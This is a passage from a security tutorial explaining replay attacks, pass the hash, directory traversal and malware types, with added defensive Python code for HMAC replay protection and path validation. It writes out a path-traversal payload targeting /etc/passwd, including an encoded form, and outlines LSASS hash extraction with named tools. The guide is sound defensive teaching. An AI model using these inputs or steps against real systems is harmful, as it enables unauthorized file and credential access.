• Session management: Implement proper session management policies, such as setting timeouts and regularly renewing session tokens, so that a captured token is useful only for a short time. Within a connection, a sequence number that must strictly increase serves the same purpose.

• Encryption: Use strong, end-to-end encryption for data being transmitted between parties. This prevents an attacker from reading the data, but on its own it does not prevent replay: an encrypted message can be captured and resent exactly as it was, and the receiver will decrypt it successfully. Replay protection comes from the freshness field (timestamp, nonce or counter), which the encryption and authentication must cover.

• Message authentication: Implement message authentication mechanisms, such as digital signatures or Message Authentication Codes (MAC), to ensure the integrity of the transmitted data. The timestamp or nonce must be inside the authenticated portion of the message; otherwise the attacker simply updates it on the replayed copy.

Understanding and implementing these prevention techniques will help alleviate the risks associated with replay attacks and enhance the overall security of your system.
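Timestamp, nonce and MAC only work as a combination, which is easiest to see with both ends of the exchange in one place. The following is an added example, not code from the original document: a client that binds a timestamp and a random nonce into each message and authenticates it with HMAC-SHA256, and a receiver that checks the MAC, the freshness window and nonce uniqueness in that order, keeping seen nonces only for the window. The shared key, the 30-second window, the message format and the constructed transfer message are assumptions for the demonstration.

```python
import hashlib
import hmac
import json
import secrets
import time

SHARED_KEY = secrets.token_bytes(32)   # assumption: pre-shared by client and server
FRESHNESS_WINDOW = 30                  # seconds a message stays acceptable (assumption)


def sign_message(payload, now=None):
    """Client side: put a timestamp and a random nonce inside the message and
    MAC the whole thing, so a captured copy can neither be altered nor re-dated."""
    body = {"payload": payload,
            "ts": int(now if now is not None else time.time()),
            "nonce": secrets.token_hex(16)}
    encoded = json.dumps(body, sort_keys=True).encode()
    return {"body": encoded,
            "mac": hmac.new(SHARED_KEY, encoded, hashlib.sha256).hexdigest()}


class Receiver:
    """Server side: check the MAC, then freshness, then nonce uniqueness.
    Nonces are remembered only for the freshness window, so the set stays bounded
    without re-admitting a replay (anything older is rejected by the timestamp)."""

    def __init__(self, window=FRESHNESS_WINDOW):
        self.window = window
        self.seen = {}   # nonce -> timestamp of the message it came from

    def accept(self, message, now=None):
        now = now if now is not None else time.time()
        expected = hmac.new(SHARED_KEY, message["body"], hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, message["mac"]):
            return False, "bad MAC"                       # tampered or forged
        body = json.loads(message["body"])
        if abs(now - body["ts"]) > self.window:
            return False, "stale or future-dated"         # outside the window
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        if body["nonce"] in self.seen:
            return False, "replay"                        # same nonce seen before
        self.seen[body["nonce"]] = body["ts"]
        return True, body["payload"]


def demo(now=1_700_000_000):
    """Constructed exchange: a fresh message, the same bytes replayed, a copy
    with the amount edited, and a genuine message delivered too late."""
    receiver = Receiver()
    msg = sign_message({"action": "transfer", "amount": 100}, now=now)
    tampered = dict(msg, body=msg["body"].replace(b"100", b"999"))
    return {
        "fresh": receiver.accept(msg, now=now + 1)[0],
        "replayed": receiver.accept(msg, now=now + 2)[0],
        "tampered": receiver.accept(tampered, now=now + 3)[0],
        "stale": receiver.accept(sign_message({"action": "ping"}, now=now), now=now + 120)[0],
    }


if __name__ == "__main__":
    print(demo())   # {'fresh': True, 'replayed': False, 'tampered': False, 'stale': False}
```

Note the order of the checks: the MAC is verified before the body is parsed, so an attacker who edits the timestamp or nonce is rejected as a forgery and never reaches the freshness logic. Dropping the MAC would let the attacker re-date a captured message; dropping the nonce would let them replay it inside the window.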

Pass the Hash

Pass the hash (PtH) is a type of cyber attack that enables an attacker to authenticate to remote systems by using the underlying NTLM (or, on legacy systems that still store it, LanMan) hash of a user’s password, rather than requiring the plaintext password itself. This type of attack exploits the fact that in NTLM authentication the hash, not the password, is the secret used to compute the response to the server’s challenge, giving an attacker access to a user’s account without the need to crack the password itself.

How does Pass the Hash work?

• Initial compromise: The attacker first compromises a single workstation or user account on the target network. This can be done via social engineering, phishing, exploiting software vulnerabilities, or other methods.

• Hash extraction: Once the attacker gains administrative access to the compromised system, they are able to extract password hashes: the NT hashes of currently and recently logged-on users cached in the memory of the LSASS process, and the local account hashes stored in the SAM database. Tools like Mimikatz, Windows Credential Editor, or PowerShell scripts can be used to obtain these hashes. Any privileged user who has logged on interactively to that machine has left a hash there.

• Lateral movement: The attacker then leverages the extracted password hashes to access other systems and services within the network, typically over SMB, WMI or WinRM. This is done by using the PtH technique to authenticate as legitimate users. The attacker continues to search for and collect additional password hashes, looking for privileged account hashes that can grant them further access.

• Privilege escalation: The attacker uses the stolen privileged account hashes to gain increased permissions on the network. Reaching a domain controller lets the attacker dump the hashes of every domain account, which can lead to control over critical systems, exfiltration of sensitive data, or backdoors for future attacks.

Mitigation Strategies

To defend against pass the hash attacks, organizations should implement a combination of the following measures:

• Network segmentation: Divide the network into separate segments, restricting access to sensitive systems and limiting unauthorized lateral movement. In particular, block workstation-to-workstation SMB and remote management traffic, which legitimate users rarely need.

• Multi-factor authentication (MFA): Implement MFA for user accounts, particularly for administrator accounts. Note that MFA only helps where the authentication path enforces it: an NTLM network logon performed with a stolen hash never prompts for a second factor, so pair MFA with restricting or disabling NTLM and with the credential-hygiene measures below.

• Strong password policies: Enforce strong, unique passwords. This makes offline cracking of captured hashes harder, but it does not stop pass the hash itself, because the hash is used directly. What does help is ensuring that one hash does not work everywhere: give every machine a unique local administrator password (for example with LAPS) and avoid shared privileged accounts.

• Least privilege principle: Limit user account privileges and ensure that users only have the permissions necessary for their job roles. Administrators should use separate, dedicated admin accounts and never log on to ordinary workstations with them, so that high-value hashes are not left in the memory of low-trust machines.

• Credential Guard: Use Windows Credential Guard or similar security features on supported operating systems to isolate stored credentials from the operating system and limit the risk of hash extraction from LSASS memory. Adding sensitive accounts to the Protected Users group similarly prevents their NTLM credentials from being cached or used.

• Regular monitoring and auditing: Continuously monitor and audit user activities, access logs, and system security to detect and prevent unauthorized access or suspicious activity. For pass the hash, look for NTLM network logons (Windows security event 4624 with logon type 3 and authentication package NTLM) from workstations to systems they never normally reach, and for one account authenticating to many hosts in a short period.

Directory Traversal
Directory traversal, also known as path traversal, is a type of cyber attack
that allows an attacker to access restricted files and directories on a server,
usually with the goal of obtaining sensitive information. This vulnerability
occurs when user input is not adequately validated and the attacker can
manipulate it to traverse the server directory structure.

How it Works

In a directory traversal attack, the attacker attempts to exploit an input field (e.g., a file or image upload form, URL parameters, etc.) that takes a file path as input. By supplying specially crafted input, an attacker can manipulate the server into providing access to unauthorized files and directories.

For example, consider a web application that allows users to view the
contents of a specific file by specifying its path through a URL parameter,
such as:

https://www.example.com/file.php?path=/user/documents/report.pdf

In this case, an attacker could manipulate the path parameter to traverse the server’s directories, like this:

https://www.example.com/file.php?path=../../../../etc/passwd

If the server doesn’t properly validate and canonicalize the input, it will read whatever file the resolved path points to, here /etc/passwd, which lists the system’s user accounts (the password hashes live in /etc/shadow, readable only by root, which is why the privileges the application runs with matter). Other common targets are application configuration files containing database credentials, and the application’s own source code.

Mitigation Techniques

There are several methods to prevent directory traversal attacks:

• Input Validation: Ensure that user input is strictly validated. Checking for sequences such as ’..’ and path separators (’/’ and ’\’) and rejecting the request if they are present is a start, but blocklists are easy to bypass with URL encoding (%2e%2e%2f), double encoding, or mixed separators. The robust check is to resolve the supplied path to its canonical absolute form (after decoding, following symlinks) and verify that the result still lies inside the intended base directory; better still, do not accept paths at all but an identifier that the application maps to a file.

• Access Control: Implement proper access control mechanisms to prevent unauthorized access to files and directories. For example, use a whitelist approach to establish which files and directories the user is allowed to access.

• Least Privilege: Practice the principle of least privilege by ensuring that an application runs with only the necessary permissions needed for its operation. This can minimize the potential impact of a directory traversal attack: a web process that cannot read /etc/shadow or the application’s own source cannot leak them, whatever path it is tricked into opening.

• Use Chroot Jails: Deploy applications inside chroot jails, or containers with a minimal filesystem, to restrict access to a certain directory, thwarting attempts to traverse outside that directory.

By implementing these countermeasures, you can minimize the risk of directory traversal attacks and help protect your system’s critical files and directories.
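The canonicalize-then-check approach from the validation point above, applied to the file.php?path=... case in the text. This is an added example, not code from the original document: a resolver that decodes the supplied path once, resolves it to a real absolute path and refuses anything outside the base directory, tried against the text’s payload, an URL-encoded variant, an absolute path and a symlink. The base directory and its contents are constructed in a temporary directory, and the function names are assumptions for the demonstration.

```python
import os
import tempfile
from urllib.parse import unquote


class TraversalAttempt(ValueError):
    """Raised when a user-supplied path resolves outside the allowed directory."""


def resolve_under_base(base_dir, user_path):
    """Canonicalise, then check containment. Rejecting '..' alone is not enough:
    encoded forms (%2e%2e%2f), absolute paths and symlinks get past a character
    blocklist, but none of them get past realpath() plus a prefix check."""
    base = os.path.realpath(base_dir)
    candidate = unquote(user_path)                      # decode once, as a web server would
    target = os.path.realpath(os.path.join(base, candidate))
    if os.path.commonpath([base, target]) != base:
        raise TraversalAttempt(f"{user_path!r} resolves to {target}, outside {base}")
    return target


def read_user_file(base_dir, user_path):
    """The safe equivalent of file.php?path=... from the text."""
    with open(resolve_under_base(base_dir, user_path), "rb") as fh:
        return fh.read()


def is_allowed(base_dir, user_path):
    try:
        resolve_under_base(base_dir, user_path)
        return True
    except TraversalAttempt:
        return False


def build_demo_tree():
    """Constructed sandbox: <base>/documents/report.pdf plus, where the platform
    permits it, a symlink 'escape' pointing at the parent directory."""
    base = tempfile.mkdtemp(prefix="files-")
    os.makedirs(os.path.join(base, "documents"))
    with open(os.path.join(base, "documents", "report.pdf"), "wb") as fh:
        fh.write(b"%PDF-1.4 constructed sample\n")
    try:
        os.symlink(os.path.dirname(base), os.path.join(base, "escape"))
    except OSError:
        pass   # symlink creation not permitted here; the other cases still apply
    return base


if __name__ == "__main__":
    base = build_demo_tree()
    for path in ("documents/report.pdf", "../../../../etc/passwd",
                 "%2e%2e/%2e%2e/etc/passwd", "/etc/passwd", "escape/anything"):
        print(f"{path!r:32} -> {'allowed' if is_allowed(base, path) else 'REJECTED'}")
```

Note that os.path.join discards the base when the user supplies an absolute path, which is precisely why the containment check is done on the resolved result rather than on the input; the symlink case shows why realpath, which follows links, is used instead of a purely lexical normalisation.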

Malware
Malware, short for malicious software, refers to any software intentionally created to cause harm to a computer system, server, network, or user. It is a broad term covering the many kinds of harmful software that criminals build for different purposes. In this guide, we will delve deeper into the major types of malware and their characteristics.

Virus

A computer virus is a type of malware that, much like a biological virus, attaches itself to a host (e.g., a file or software) and replicates when the host is executed. Viruses can corrupt, delete or modify data, and slow down system performance.

Worm

Worms are self-replicating malware that spread through networks without human intervention. They exploit system vulnerabilities, consuming bandwidth and sometimes carrying a payload to infect target machines.

Trojan Horse

A trojan horse is a piece of software disguised as a legitimate program but containing harmful code. Users unknowingly download and install it, giving the attacker unauthorized access to the computer or network. Trojans can be used to steal data, create a backdoor, or launch additional malware attacks.

Ransomware

Ransomware is a type of malware that encrypts its victims’ files and demands a ransom, typically in the form of cryptocurrency, for the decryption key. If the victim refuses or fails to pay within a specified time, the encrypted data may be lost forever.

Spyware

Spyware is a type of malware designed to collect and relay information about a user or organization without their consent. It can capture keystrokes, record browsing history, and access personal data such as usernames and passwords.

Adware

Adware is advertising-supported software that automatically displays or downloads advertising materials, often in the form of pop-up ads, on a user’s computer. While not always malicious, adware can be intrusive and open the door for other malware infections.

Rootkit

A rootkit is a type of malware designed to hide its own presence and that of other malicious programs on a computer system, typically by hooking operating-system functions so that certain files, processes or network connections are omitted from what users and security software see. This enables it to maintain persistent unauthorized access to the system and makes it difficult to detect and remove the infection.

Keylogger

Keyloggers are a type of malware that monitor and record users’ keystrokes, allowing attackers to capture sensitive information, such as login credentials or financial information entered on a keyboard.

Understanding the different types of malware can help you better identify
and protect against various cyber threats. As the cyber landscape continues
to evolve, it’s essential to stay informed about emerging malware and equip
yourself with the necessary security skills and knowledge.
